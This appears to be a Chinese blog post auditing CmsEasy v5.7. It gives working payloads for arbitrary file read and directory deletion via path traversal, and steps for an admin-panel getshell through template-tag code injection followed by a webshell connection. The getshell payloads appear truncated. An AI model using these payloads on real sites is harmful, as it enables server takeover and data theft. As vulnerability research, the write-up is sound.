CmsEasy_v5.7 漏洞测试

01

前言

下载了一套CMS，看了一下，部分代码加密，也懒得去解密了，费事。直接登录后台进行黑盒结合白盒进行测试，也发现了一些问题，汇总一下，不做具体代码分析。

02

环境准备

CmsEasy官网：http://www.cmseasy.cn

网站源码版本：CmsEasy_v5.7_UTF8-0208

程序源码下载： http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.7_UTF-8_20180208.zip

默认后台： http://127.0.0.1/index.php?case=admin&act=login&admin_dir=admin&site=default

查看CMS版本：http://127.0.0.1/cache/data/inf.txt

账号密码 自设

03

任意文件读取

读取config.php配置文件内容

Payload：http://127.0.0.1/index.php?case=template&act=fetch&admin_dir=admin&site=default

【POST】:&id=../../config/config.php

04

任意目录删除

网站根目录新建test目录作为测试目录

Payload：http://127.0.0.1/index.php?case=database&act=restore&admin_dir=admin&site=default

【POST】：select%5B%5D=../test&submit=+%C3%97+%E5%88%A0%E9%99%A4+

05

存储型XSS

06

后台Getshell

代码分析：

漏洞文件位置：/lib/table/table_templatetagwap.php 第3-20行：

1.classtable_templatetag extends table_mode {

2.function vaild() {

3.if(!front::post('name')) {

4.front::flash('请填写名称！');

5.returnfalse;

6.}

7.if(!front::post('tagcontent')) {

8.front::flash('请填写内容！');

9.returnfalse;

10.}

11.returntrue;

12.}

13.function save_before() {

14.if(!front::post('tagfrom')) front::$post['tagfrom']='define';

15.if(!front::post('attr1')) front::$post['attr1']='0';

16.if(front::$post['tagcontent']) front::$post['tagcontent'] = htmlspecialchars_decode(front::$post['tagcontent']);

17.}

18.}

可以看到在写入文件之前，使用htmlspecialchars_decode函数把预定义的 HTML 实体""（大于）转换为字符。因此我们可以使用双引号闭合，从而构造出Payload写入文件，进一步触发代码，导致程序在实现上存在代码执行漏洞。攻击者可通过构造恶意脚本代码写入配置文件，从而执行命令，控制网站服务器权限。

漏洞利用:

1、登录后台，模板--自定义标签—添加自定义标签--填写Payload—提交： Payload： 1111111111";}

2、提交保存后，点击预览，成功触发代码，或者查看id的值，然后直接访问文件路径：http://127.0.0.1/config/tag/category_13.php

3、附绕代码检测的一句话Payload: 11";}

通过菜刀连接，控制网站服务器：

07

总结

一次不太成功的代码审计日志，因部分代码加密，使用黑盒结合白盒的手法，根据功能点进行审计，可以快速发掘程序中存在的安全漏洞。接下来，将不定时更新各种CMS的代码审计文章，欢迎志同道合的朋友来相互探讨，交流。

Bypass

About Me

一个网络安全爱好者，对技术有着偏执狂一样的追求。致力于分享原创高质量干货，包括但不限于：渗透测试、WAF绕过、代码审计、安全运维。